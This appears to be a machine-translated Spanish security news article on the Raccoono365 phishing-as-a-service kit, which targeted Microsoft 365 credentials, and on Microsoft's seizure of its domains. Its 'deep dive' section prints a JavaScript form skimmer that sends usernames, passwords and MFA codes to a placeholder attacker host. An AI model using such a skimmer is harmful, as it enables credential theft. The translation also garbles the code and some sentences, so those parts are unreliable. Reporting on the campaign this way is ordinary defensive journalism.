Desde mediados de 2024, los ciberdelincuentes han aprovechado una plataforma de phishing basada en suscripción conocida como Raccoono365 para cosechar credenciales de Microsoft 365 a escala.
Al emerger como un servicio listo para usar, Raccoono365 requiere una habilidad técnica mínima, lo que permite a los actores de amenaza a desplegar campañas de phishing convincentes al hacerse pasar por las comunicaciones oficiales de Microsoft.
Estos kits replican la marca de Microsoft, las plantillas de correo electrónico y los portales de inicio de sesión para engañar a los destinatarios para divulgar los nombres de usuario, las contraseñas y los códigos de autenticación multifactor (MFA).
A partir de septiembre de 2025, esta operación ha afectado a más de 5,000 cuentas en 94 países, lo que demuestra el riesgo generalizado planteado por las herramientas de ingeniería social mercantilizadas.
En una acción legal coordinada, la Unidad de Delitos Digitales de Microsoft (DCU) obtuvo una orden judicial del Distrito Sur de Nueva York para confiscar 338 dominios que facilitan la distribución de Raccoono365, desmantelando efectivamente la infraestructura central de la plataforma.
Los analistas de Microsoft notaron la rápida evolución de este servicio, que ahora cuenta con características que subvierten las protecciones de MFA y automatizan la recolección de credenciales a tarifas de hasta 9,000 objetivos por día.
Los dominios incautados sirvieron como anfitriones de phishing e interfaces de comando y control para la gestión de suscripción, paralizando la capacidad de los suscriptores para lanzar nuevos ataques.
Aunque no todas las credenciales robadas dieron como resultado intrusiones de red directas, el impacto en los sectores de alto valor, particularmente la atención médica, fue grave.
Al menos 20 organizaciones de atención médica de EE. UU. Informaron la atención retrasada del paciente, los resultados del laboratorio comprometidos y las violaciones de datos después de los exitosos intentos de phishing RACCOONO365.
La asociación de Microsoft con Health-ISAC subrayó las implicaciones de seguridad pública, ya que las credenciales robadas a menudo sirvieron como puntos de acceso iniciales para implementaciones posteriores de malware o ransomware.
La rápida intervención de la DCU ilustra la necesidad de contramedidas legales y técnicas contra las herramientas de baja barrera que potencian a los actores maliciosos.
Analistas de Microsoft identificado Joshua Ogundipe, desarrollador con sede en Nigeria, como arquitecto principal de Raccoono365.
A través de un lapso de seguridad operativo que revela una billetera de criptomonedas, los investigadores trazaron más de US $ 100,000 en pagos de suscripción.
El canal Telegram de Ogundipe, con más de 850 miembros, anunció tanto kits de phishing estándar como un servicio “AI-Mailcheck” recientemente introducido diseñado para refinar la eficacia de phishing de lanza.
Esta atribución subraya cómo las empresas criminales simplificadas pueden escalar con una sobrecarga mínima, desafiando a los defensores a anticipar servicios de amenaza modular.
Mecanismo de infección Dive Deep Dive
El mecanismo de infección de Raccoono365 gira en torno a la inyección dinámica de la forma y las tácticas de redirección transparentes.
Cuando una víctima hace clic en un enlace malicioso, el navegador se redirige a una página de inicio de sesión de señuelo que refleja el portal oficial de Microsoft.
Página de inicio de sesión RACCOONO365 (Fuente – Microsoft)
Un pequeño fragmento de JavaScript, inyectado en tiempo de ejecución, captura campos de entrada y reenvía credenciales al servidor del atacante:-
document.Queryselector (‘form’). addEventListener (‘enviar’, function (e) {e.preventDefault (); let creds = {user: document.getElementById (‘username’). Value, pass: document.getElementById (‘contraseña’). Value, OTP: document.getCeementByid (‘MfA’). Value}; fetch (‘https://attacker-server.com/collect’, {método: ‘post’, cuerpo: json.stringify (creds), encabezados: {‘content-type’: ‘application/json’}}). entonces () => window.location.href = “https://login.microsoftonline.com”);
Este código garantiza una exfiltración de datos sin problemas al tiempo que redirige a los usuarios a la página de inicio de sesión legítimo, minimizando la sospecha.
Los operadores avanzados emplean la reutilización de la sesión de la sesión y la manipulación del encabezado para evitar las indicaciones de MFA.
RACCOONO365 Publicidad de un nuevo servicio habilitado para AI (fuente-Microsoft)
Combinado con la distribución automatizada por correo electrónico y la variación de contenido impulsada por la IA, esta cadena de infección ejemplifica la sofisticación moderna de phishing y subraya la importancia crítica de las defensas en capas y la conciencia del usuario.
¡Webinar gratuito en vivo en nuevas tácticas de malware de nuestros analistas! Aprenda técnicas de detección avanzada -> Regístrese gratis
